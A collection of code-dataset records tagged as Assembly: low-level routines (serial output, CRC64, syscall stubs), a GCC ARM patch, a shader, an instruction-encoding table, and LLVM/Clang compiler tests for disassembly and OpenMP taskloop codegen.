out (sys_serial_port),a
;ld b,32 ; limit send speed (gap between bytes)
ld b,20 ; limit send speed (gap between bytes)
.ssplim
djnz ssplim
ld hl,0 ;RS_ERR_OK
ret
| {
"language": "Assembly"
} |
--- a/gcc/config/arm/linux-elf.h
+++ b/gcc/config/arm/linux-elf.h
@@ -60,7 +60,7 @@
%{shared:-lc} \
%{!shared:%{profile:-lc_p}%{!profile:-lc}}"
-#define LIBGCC_SPEC "%{msoft-float:-lfloat} %{mfloat-abi=soft*:-lfloat} -lgcc"
+#define LIBGCC_SPEC "-lgcc"
#define GLIBC_DYNAMIC_LINKER "/lib/ld-linux.so.2"
--- a/gcc/config/arm/t-linux
+++ b/gcc/config/arm/t-linux
@@ -23,7 +23,11 @@ TARGET_LIBGCC2_CFLAGS = -fomit-frame-poi
LIB1ASMSRC = arm/lib1funcs.asm
LIB1ASMFUNCS = _udivsi3 _divsi3 _umodsi3 _modsi3 _dvmd_lnx _clzsi2 _clzdi2 \
- _arm_addsubdf3 _arm_addsubsf3
+ _arm_addsubdf3 _arm_addsubsf3 \
+ _arm_negdf2 _arm_muldivdf3 _arm_cmpdf2 _arm_unorddf2 \
+ _arm_fixdfsi _arm_fixunsdfsi _arm_truncdfsf2 \
+ _arm_negsf2 _arm_muldivsf3 _arm_cmpsf2 _arm_unordsf2 \
+ _arm_fixsfsi _arm_fixunssfsi
# MULTILIB_OPTIONS = mhard-float/msoft-float
# MULTILIB_DIRNAMES = hard-float soft-float
| {
"language": "Assembly"
} |
; XzCrc64Opt.asm -- CRC64 calculation : optimized version
; 2011-06-28 : Igor Pavlov : Public domain
include 7zAsm.asm
MY_ASM_START
ifdef x64
rD equ r9
rN equ r10
num_VAR equ r8
table_VAR equ r9
SRCDAT equ rN + rD
CRC_XOR macro dest:req, src:req, t:req
xor dest, QWORD PTR [r5 + src * 8 + 0800h * t]
endm
CRC1b macro
movzx x6, BYTE PTR [rD]
inc rD
movzx x3, x0_L
xor x6, x3
shr r0, 8
CRC_XOR r0, r6, 0
dec rN
endm
MY_PROLOG macro crc_end:req
MY_PUSH_4_REGS
mov r0, r1
mov rN, num_VAR
mov r5, table_VAR
mov rD, r2
test rN, rN
jz crc_end
@@:
test rD, 3
jz @F
CRC1b
jnz @B
@@:
cmp rN, 8
jb crc_end
add rN, rD
mov num_VAR, rN
sub rN, 4
and rN, NOT 3
sub rD, rN
mov x1, [SRCDAT]
xor r0, r1
add rN, 4
endm
MY_EPILOG macro crc_end:req
sub rN, 4
mov x1, [SRCDAT]
xor r0, r1
mov rD, rN
mov rN, num_VAR
sub rN, rD
crc_end:
test rN, rN
jz @F
CRC1b
jmp crc_end
@@:
MY_POP_4_REGS
endm
MY_PROC XzCrc64UpdateT4, 4
MY_PROLOG crc_end_4
align 16
main_loop_4:
mov x1, [SRCDAT]
movzx x2, x0_L
movzx x3, x0_H
shr r0, 16
movzx x6, x0_L
movzx x7, x0_H
shr r0, 16
CRC_XOR r1, r2, 3
CRC_XOR r0, r3, 2
CRC_XOR r1, r6, 1
CRC_XOR r0, r7, 0
xor r0, r1
add rD, 4
jnz main_loop_4
MY_EPILOG crc_end_4
MY_ENDP
else
rD equ r1
rN equ r7
crc_val equ (REG_SIZE * 5)
crc_table equ (8 + crc_val)
table_VAR equ [r4 + crc_table]
num_VAR equ table_VAR
SRCDAT equ rN + rD
CRC macro op0:req, op1:req, dest0:req, dest1:req, src:req, t:req
op0 dest0, DWORD PTR [r5 + src * 8 + 0800h * t]
op1 dest1, DWORD PTR [r5 + src * 8 + 0800h * t + 4]
endm
CRC_XOR macro dest0:req, dest1:req, src:req, t:req
CRC xor, xor, dest0, dest1, src, t
endm
CRC1b macro
movzx x6, BYTE PTR [rD]
inc rD
movzx x3, x0_L
xor x6, x3
shrd r0, r2, 8
shr r2, 8
CRC_XOR r0, r2, r6, 0
dec rN
endm
MY_PROLOG macro crc_end:req
MY_PUSH_4_REGS
mov rN, r2
mov x0, [r4 + crc_val]
mov x2, [r4 + crc_val + 4]
mov r5, table_VAR
test rN, rN
jz crc_end
@@:
test rD, 3
jz @F
CRC1b
jnz @B
@@:
cmp rN, 8
jb crc_end
add rN, rD
mov num_VAR, rN
sub rN, 4
and rN, NOT 3
sub rD, rN
xor r0, [SRCDAT]
add rN, 4
endm
MY_EPILOG macro crc_end:req
sub rN, 4
xor r0, [SRCDAT]
mov rD, rN
mov rN, num_VAR
sub rN, rD
crc_end:
test rN, rN
jz @F
CRC1b
jmp crc_end
@@:
MY_POP_4_REGS
endm
MY_PROC XzCrc64UpdateT4, 5
MY_PROLOG crc_end_4
movzx x6, x0_L
align 16
main_loop_4:
mov r3, [SRCDAT]
xor r3, r2
CRC xor, mov, r3, r2, r6, 3
movzx x6, x0_H
shr r0, 16
CRC_XOR r3, r2, r6, 2
movzx x6, x0_L
movzx x0, x0_H
CRC_XOR r3, r2, r6, 1
CRC_XOR r3, r2, r0, 0
movzx x6, x3_L
mov r0, r3
add rD, 4
jnz main_loop_4
MY_EPILOG crc_end_4
MY_ENDP
endif
end
| {
"language": "Assembly"
} |
# RUN: llvm-mc -triple aarch64-none-linux-gnu -mattr=+v8.2a --disassemble < %s | FileCheck %s
# RUN: llvm-mc -triple aarch64-none-linux-gnu -mattr=-v8.2a --disassemble < %s | FileCheck %s --check-prefix=NO_V82
[0x01,0x79,0x08,0xd5]
[0x22,0x79,0x08,0xd5]
# CHECK: at s1e1rp, x1
# CHECK: at s1e1wp, x2
# NO_V82: sys #0, c7, c9, #0, x1
# NO_V82: sys #0, c7, c9, #1, x2
| {
"language": "Assembly"
} |
uniform sampler2D _BumpMap;
uniform lowp vec4 _LightColor0;
uniform sampler2D _MainTex;
uniform lowp float _Shininess;
varying lowp vec2 xlv_TEXCOORD0;
varying lowp vec3 xlv_TEXCOORD1;
varying lowp vec3 xlv_TEXCOORD2;
varying lowp vec3 xlv_TEXCOORD3;
void main ()
{
lowp vec4 c_1;
lowp vec3 Normal_2;
lowp vec4 tmpvar_3;
tmpvar_3 = texture2D (_MainTex, xlv_TEXCOORD0);
Normal_2 = ((texture2D (_BumpMap, xlv_TEXCOORD0).xyz * 2.0) - 1.0);
c_1.xyz = ((tmpvar_3.xyz * (
(_LightColor0.xyz * max (0.0, dot (Normal_2, xlv_TEXCOORD2)))
+ xlv_TEXCOORD3)) + (_LightColor0.xyz * (
pow (max (0.0, dot (Normal_2, xlv_TEXCOORD1)), _Shininess)
* tmpvar_3.w)));
c_1.w = 0.0;
gl_FragData[0] = c_1;
}
// stats: 14 alu 2 tex 0 flow
// inputs: 4
// #0: xlv_TEXCOORD0 (low float) 2x1 [-1]
// #1: xlv_TEXCOORD1 (low float) 3x1 [-1]
// #2: xlv_TEXCOORD2 (low float) 3x1 [-1]
// #3: xlv_TEXCOORD3 (low float) 3x1 [-1]
// uniforms: 2 (total size: 0)
// #0: _LightColor0 (low float) 4x1 [-1]
// #1: _Shininess (low float) 1x1 [-1]
// textures: 2
// #0: _BumpMap (low 2d) 0x0 [-1]
// #1: _MainTex (low 2d) 0x0 [-1]
| {
"language": "Assembly"
} |
Address  Program              Absolute addressing   PC-relative addressing
0000     LD R1, A             00100010              001F000C
0004     ST R5, B             01500014              015F000C
0008     ADD R2, R1, R5       13215000
000C     RET                  2C000000
0010     A: WORD 3            00000003
0014     B: WORD 5            00000005
0018     XOR R1, R2, R6       1A126000
001C     SHL R1, R2, 10       1E12000A
0020     LOOP: MOV R3, R1     12310000
0024     CMP R3, R5           10350000
0028     JGT LOOP             23FFFFF4              23FFFFF4 (no absolute form)
002C     RET                  2C000000
0030     C: WORD 37           00000025
0034     D: BYTE 25           19
0035     LBR R1, R3+20        06130014
0039     LDI R8, 100          08800064
003D     ST R5, C             01500030              015FFFEF
0041     STB R13, A           03D00010              03DFFFCB
0045     RET                  2C000000
Two's-complement calculation of the PC-relative offsets:
-12  = -C:  001100   => 110011   + 1 => 110100, sign-extended => FFFFF4
-11h = -17: 00010001 => 11101110 + 1 => 11101111              => FFEF
-35h = -53: 00110101 => 11001010 + 1 => 11001011              => FFCB
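The field values above can be checked mechanically. Below is a minimal C sketch (the encode_disp helper is hypothetical, not part of the original note) that wraps a signed displacement into an n-bit two's-complement field and reproduces the three offsets:

#include <stdio.h>

/* Wrap a signed displacement into an n-bit two's-complement field. */
static unsigned encode_disp(int disp, int bits)
{
    unsigned mask = (bits >= 32) ? 0xFFFFFFFFu : ((1u << bits) - 1u);
    return (unsigned)disp & mask;    /* two's-complement wrap-around */
}

int main(void)
{
    printf("%06X\n", encode_disp(-12,   24)); /* FFFFF4: JGT LOOP, 24-bit field   */
    printf("%04X\n", encode_disp(-0x11, 16)); /* FFEF:   ST R5, C, 16-bit field   */
    printf("%04X\n", encode_disp(-0x35, 16)); /* FFCB:   STB R13, A, 16-bit field */
    return 0;
}

Compiled and run, it prints FFFFF4, FFEF and FFCB, matching the machine-code fields in the table.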
"language": "Assembly"
} |
/* SPDX-License-Identifier: GPL-2.0+ */
/*
* Copyright (C) 2011 Andes Technology Corporation
* Macpaul Lin, Andes Technology Corporation <macpaul@andestech.com>
*/
#include <asm/arch-ag101/ag101.h>
#include <linux/linkage.h>
.text
#ifndef CONFIG_SKIP_TRUNOFF_WATCHDOG
ENTRY(turnoff_watchdog)
#error "AE3XX not support wdt yet"
ENDPROC(turnoff_watchdog)
#endif
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
B syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
#include "sys.h"
.define _times
_times:
mov 2(sp),0f+2
sys indir; .data2 0f
rts pc
.sect .data
0:
sys times
.data2 0
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -verify -fopenmp -x c++ -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck %s
// RUN: %clang_cc1 -fopenmp -x c++ -std=c++11 -triple x86_64-apple-darwin10 -emit-pch -o %t %s
// RUN: %clang_cc1 -fopenmp -x c++ -triple x86_64-apple-darwin10 -std=c++11 -include-pch %t -verify %s -emit-llvm -o - | FileCheck %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -std=c++11 -DLAMBDA -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=LAMBDA %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -fblocks -DBLOCKS -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=BLOCKS %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -std=c++11 -DARRAY -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=ARRAY %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -fopenmp-simd -x c++ -std=c++11 -triple x86_64-apple-darwin10 -emit-pch -o %t %s
// RUN: %clang_cc1 -fopenmp-simd -x c++ -triple x86_64-apple-darwin10 -std=c++11 -include-pch %t -verify %s -emit-llvm -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -std=c++11 -DLAMBDA -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -fblocks -DBLOCKS -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -std=c++11 -DARRAY -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// SIMD-ONLY0-NOT: {{__kmpc|__tgt}}
// expected-no-diagnostics
// It doesn't pass on win32. Investigating.
// REQUIRES: shell
#ifndef ARRAY
#ifndef HEADER
#define HEADER
template <class T>
struct S {
T f;
S(T a) : f(a) {}
S() : f() {}
operator T() { return T(); }
~S() {}
};
volatile double g;
// CHECK-DAG: [[KMP_TASK_T_TY:%.+]] = type { i8*, i32 (i32, i8*)*, i32, %union{{.+}}, %union{{.+}}, i64, i64, i64, i32, i8* }
// CHECK-DAG: [[S_DOUBLE_TY:%.+]] = type { double }
// CHECK-DAG: [[CAP_MAIN_TY:%.+]] = type { i8 }
// CHECK-DAG: [[PRIVATES_MAIN_TY:%.+]] = type {{.?}}{ [2 x [[S_DOUBLE_TY]]], [[S_DOUBLE_TY]], i32, [2 x i32]
// CHECK-DAG: [[KMP_TASK_MAIN_TY:%.+]] = type { [[KMP_TASK_T_TY]], [[PRIVATES_MAIN_TY]] }
// CHECK-DAG: [[S_INT_TY:%.+]] = type { i32 }
// CHECK-DAG: [[CAP_TMAIN_TY:%.+]] = type { i8 }
// CHECK-DAG: [[PRIVATES_TMAIN_TY:%.+]] = type { i32, [2 x i32], [2 x [[S_INT_TY]]], [[S_INT_TY]], [104 x i8] }
// CHECK-DAG: [[KMP_TASK_TMAIN_TY:%.+]] = type { [[KMP_TASK_T_TY]], [{{[0-9]+}} x i8], [[PRIVATES_TMAIN_TY]] }
template <typename T>
T tmain() {
S<T> test;
T t_var __attribute__((aligned(128))) = T();
T vec[] = {1, 2};
S<T> s_arr[] = {1, 2};
S<T> var(3);
#pragma omp taskloop simd private(t_var, vec, s_arr, s_arr, var, var)
for (int i = 0; i < 10; ++i) {
vec[0] = t_var;
s_arr[0] = var;
}
return T();
}
int main() {
static int sivar;
#ifdef LAMBDA
// LAMBDA: [[G:@.+]] = global double
// LAMBDA-LABEL: @main
// LAMBDA: call{{( x86_thiscallcc)?}} void [[OUTER_LAMBDA:@.+]](
[&]() {
// LAMBDA: define{{.*}} internal{{.*}} void [[OUTER_LAMBDA]](
// LAMBDA: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc(%{{[^ ]+}} @{{[^,]+}}, i32 %{{[^,]+}}, i32 1, i64 96, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, %{{[^*]+}}*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// LAMBDA: [[PRIVATES:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* %{{.+}}, i{{.+}} 0, i{{.+}} 1
// LAMBDA: call void @__kmpc_taskloop(%{{.+}}* @{{.+}}, i32 %{{.+}}, i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* null)
// LAMBDA: ret
#pragma omp taskloop simd private(g, sivar)
for (int i = 0; i < 10; ++i) {
// LAMBDA: define {{.+}} void [[INNER_LAMBDA:@.+]](%{{.+}}* [[ARG_PTR:%.+]])
// LAMBDA: store %{{.+}}* [[ARG_PTR]], %{{.+}}** [[ARG_PTR_REF:%.+]],
// LAMBDA: [[ARG_PTR:%.+]] = load %{{.+}}*, %{{.+}}** [[ARG_PTR_REF]]
// LAMBDA: [[G_PTR_REF:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* [[ARG_PTR]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// LAMBDA: [[G_REF:%.+]] = load double*, double** [[G_PTR_REF]]
// LAMBDA: store double 2.0{{.+}}, double* [[G_REF]]
// LAMBDA: [[SIVAR_PTR_REF:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* [[ARG_PTR]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// LAMBDA: [[SIVAR_REF:%.+]] = load i{{[0-9]+}}*, i{{[0-9]+}}** [[SIVAR_PTR_REF]]
// LAMBDA: store i{{[0-9]+}} 3, i{{[0-9]+}}* [[SIVAR_REF]]
// LAMBDA: define internal i32 [[TASK_ENTRY]](i32, %{{.+}}* noalias)
g = 1;
sivar = 2;
// LAMBDA: store double 1.0{{.+}}, double* %{{.+}},
// LAMBDA: store i{{[0-9]+}} 2, i{{[0-9]+}}* %{{.+}},
// LAMBDA: call void [[INNER_LAMBDA]](%
// LAMBDA: ret
[&]() {
g = 2;
sivar = 3;
}();
}
}();
return 0;
#elif defined(BLOCKS)
// BLOCKS: [[G:@.+]] = global double
// BLOCKS-LABEL: @main
// BLOCKS: call void {{%.+}}(i8
^{
// BLOCKS: define{{.*}} internal{{.*}} void {{.+}}(i8*
// BLOCKS: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc(%{{[^ ]+}} @{{[^,]+}}, i32 %{{[^,]+}}, i32 1, i64 96, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, %{{[^*]+}}*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// BLOCKS: [[PRIVATES:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* %{{.+}}, i{{.+}} 0, i{{.+}} 1
// BLOCKS: call void @__kmpc_taskloop(%{{.+}}* @{{.+}}, i32 %{{.+}}, i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* null)
// BLOCKS: ret
#pragma omp taskloop simd private(g, sivar)
for (int i = 0; i < 10; ++i) {
// BLOCKS: define {{.+}} void {{@.+}}(i8*
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS: store double 2.0{{.+}}, double*
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: store i{{[0-9]+}} 4, i{{[0-9]+}}*
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: ret
// BLOCKS: define internal i32 [[TASK_ENTRY]](i32, %{{.+}}* noalias)
g = 1;
sivar = 3;
// BLOCKS: store double 1.0{{.+}}, double* %{{.+}},
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS: store i{{[0-9]+}} 3, i{{[0-9]+}}* %{{.+}},
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: call void {{%.+}}(i8
^{
g = 2;
sivar = 4;
}();
}
}();
return 0;
#else
S<double> test;
int t_var = 0;
int vec[] = {1, 2};
S<double> s_arr[] = {1, 2};
S<double> var(3);
#pragma omp taskloop simd private(var, t_var, s_arr, vec, s_arr, var, sivar)
for (int i = 0; i < 10; ++i) {
vec[0] = t_var;
s_arr[0] = var;
sivar = 8;
}
#pragma omp task
g+=1;
return tmain<int>();
#endif
}
// CHECK: define i{{[0-9]+}} @main()
// CHECK: [[TEST:%.+]] = alloca [[S_DOUBLE_TY]],
// CHECK: [[T_VAR_ADDR:%.+]] = alloca i32,
// CHECK: [[VEC_ADDR:%.+]] = alloca [2 x i32],
// CHECK: [[S_ARR_ADDR:%.+]] = alloca [2 x [[S_DOUBLE_TY]]],
// CHECK: [[VAR_ADDR:%.+]] = alloca [[S_DOUBLE_TY]],
// CHECK: [[GTID:%.+]] = call i32 @__kmpc_global_thread_num([[LOC:%.+]])
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR:@.+]]([[S_DOUBLE_TY]]* [[TEST]])
// Do not store original variables in capture struct.
// CHECK-NOT: getelementptr inbounds [[CAP_MAIN_TY]],
// Allocate task.
// Returns struct kmp_task_t {
// [[KMP_TASK_T_TY]] task_data;
// [[KMP_TASK_MAIN_TY]] privates;
// };
// CHECK: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc([[LOC]], i32 [[GTID]], i32 9, i64 120, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_MAIN_TY]]*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// CHECK: [[RES_KMP_TASK:%.+]] = bitcast i8* [[RES]] to [[KMP_TASK_MAIN_TY]]*
// CHECK: [[TASK:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// Initialize kmp_task_t->privates with default values (no init for simple types, default constructors for classes).
// Also copy address of private copy to the corresponding shareds reference.
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// Constructors for s_arr and var.
// s_arr;
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: call void [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]* [[S_ARR_CUR:%.+]])
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* [[S_ARR_CUR]], i{{.+}} 1
// CHECK: icmp eq
// CHECK: br i1
// var;
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 1
// CHECK: call void [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]* [[PRIVATE_VAR_REF:%.+]])
// Provide pointer to destructor function, which will destroy private variables at the end of the task.
// CHECK: [[DESTRUCTORS_REF:%.+]] = getelementptr inbounds [[KMP_TASK_T_TY]], [[KMP_TASK_T_TY]]* [[TASK]], i{{.+}} 0, i{{.+}} 3
// CHECK: [[DESTRUCTORS_PTR:%.+]] = bitcast %union{{.+}}* [[DESTRUCTORS_REF]] to i32 (i32, i8*)**
// CHECK: store i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_MAIN_TY]]*)* [[DESTRUCTORS:@.+]] to i32 (i32, i8*)*), i32 (i32, i8*)** [[DESTRUCTORS_PTR]],
// Start task.
// CHECK: call void @__kmpc_taskloop([[LOC]], i32 [[GTID]], i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* bitcast (void ([[KMP_TASK_MAIN_TY]]*, [[KMP_TASK_MAIN_TY]]*, i32)* [[MAIN_DUP:@.+]] to i8*))
// CHECK: call i32 @__kmpc_omp_task([[LOC]], i32 [[GTID]], i8*
// CHECK: = call i{{.+}} [[TMAIN_INT:@.+]]()
// No destructors must be called for private copies of s_arr and var.
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_DOUBLE_TY_DESTR:@.+]]([[S_DOUBLE_TY]]*
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: ret
//
// CHECK: define internal void [[PRIVATES_MAP_FN:@.+]]([[PRIVATES_MAIN_TY]]* noalias, [[S_DOUBLE_TY]]** noalias, i32** noalias, [2 x [[S_DOUBLE_TY]]]** noalias, [2 x i32]** noalias, i32** noalias)
// CHECK: [[PRIVATES:%.+]] = load [[PRIVATES_MAIN_TY]]*, [[PRIVATES_MAIN_TY]]**
// CHECK: [[PRIV_S_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 0
// CHECK: [[ARG3:%.+]] = load [2 x [[S_DOUBLE_TY]]]**, [2 x [[S_DOUBLE_TY]]]*** %{{.+}},
// CHECK: store [2 x [[S_DOUBLE_TY]]]* [[PRIV_S_VAR]], [2 x [[S_DOUBLE_TY]]]** [[ARG3]],
// CHECK: [[PRIV_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 1
// CHECK: [[ARG1:%.+]] = load [[S_DOUBLE_TY]]**, [[S_DOUBLE_TY]]*** {{.+}},
// CHECK: store [[S_DOUBLE_TY]]* [[PRIV_VAR]], [[S_DOUBLE_TY]]** [[ARG1]],
// CHECK: [[PRIV_T_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 2
// CHECK: [[ARG2:%.+]] = load i32**, i32*** %{{.+}},
// CHECK: store i32* [[PRIV_T_VAR]], i32** [[ARG2]],
// CHECK: [[PRIV_VEC:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 3
// CHECK: [[ARG4:%.+]] = load [2 x i32]**, [2 x i32]*** %{{.+}},
// CHECK: store [2 x i32]* [[PRIV_VEC]], [2 x i32]** [[ARG4]],
// CHECK: ret void
// CHECK: define internal i32 [[TASK_ENTRY]](i32, [[KMP_TASK_MAIN_TY]]* noalias)
// CHECK: [[PRIV_VAR_ADDR:%.+]] = alloca [[S_DOUBLE_TY]]*,
// CHECK: [[PRIV_T_VAR_ADDR:%.+]] = alloca i32*,
// CHECK: [[PRIV_S_ARR_ADDR:%.+]] = alloca [2 x [[S_DOUBLE_TY]]]*,
// CHECK: [[PRIV_VEC_ADDR:%.+]] = alloca [2 x i32]*,
// CHECK: [[PRIV_SIVAR_ADDR:%.+]] = alloca i32*,
// CHECK: store void (i8*, ...)* bitcast (void ([[PRIVATES_MAIN_TY]]*, [[S_DOUBLE_TY]]**, i32**, [2 x [[S_DOUBLE_TY]]]**, [2 x i32]**, i32**)* [[PRIVATES_MAP_FN]] to void (i8*, ...)*), void (i8*, ...)** [[MAP_FN_ADDR:%.+]],
// CHECK: [[MAP_FN:%.+]] = load void (i8*, ...)*, void (i8*, ...)** [[MAP_FN_ADDR]],
// CHECK: call void (i8*, ...) [[MAP_FN]](i8* %{{.+}}, [[S_DOUBLE_TY]]** [[PRIV_VAR_ADDR]], i32** [[PRIV_T_VAR_ADDR]], [2 x [[S_DOUBLE_TY]]]** [[PRIV_S_ARR_ADDR]], [2 x i32]** [[PRIV_VEC_ADDR]], i32** [[PRIV_SIVAR_ADDR]])
// CHECK: [[PRIV_VAR:%.+]] = load [[S_DOUBLE_TY]]*, [[S_DOUBLE_TY]]** [[PRIV_VAR_ADDR]],
// CHECK: [[PRIV_T_VAR:%.+]] = load i32*, i32** [[PRIV_T_VAR_ADDR]],
// CHECK: [[PRIV_S_ARR:%.+]] = load [2 x [[S_DOUBLE_TY]]]*, [2 x [[S_DOUBLE_TY]]]** [[PRIV_S_ARR_ADDR]],
// CHECK: [[PRIV_VEC:%.+]] = load [2 x i32]*, [2 x i32]** [[PRIV_VEC_ADDR]],
// CHECK: [[PRIV_SIVAR:%.+]] = load i32*, i32** [[PRIV_SIVAR_ADDR]],
// Privates actually are used.
// CHECK-DAG: [[PRIV_VAR]]
// CHECK-DAG: [[PRIV_T_VAR]]
// CHECK-DAG: [[PRIV_S_ARR]]
// CHECK-DAG: [[PRIV_VEC]]
// CHECK-DAG: [[PRIV_SIVAR]]
// CHECK: ret
// CHECK: define internal void [[MAIN_DUP]]([[KMP_TASK_MAIN_TY]]*, [[KMP_TASK_MAIN_TY]]*, i32)
// CHECK: getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* %{{.+}}, i32 0, i32 1
// CHECK: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i64 2
// CHECK: br label %
// CHECK: phi [[S_DOUBLE_TY]]*
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]*
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i64 1
// CHECK: icmp eq [[S_DOUBLE_TY]]* %
// CHECK: br i1 %
// CHECK: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* %{{.+}}, i32 0, i32 1
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]*
// CHECK: ret void
// CHECK: define internal i32 [[DESTRUCTORS]](i32, [[KMP_TASK_MAIN_TY]]* noalias)
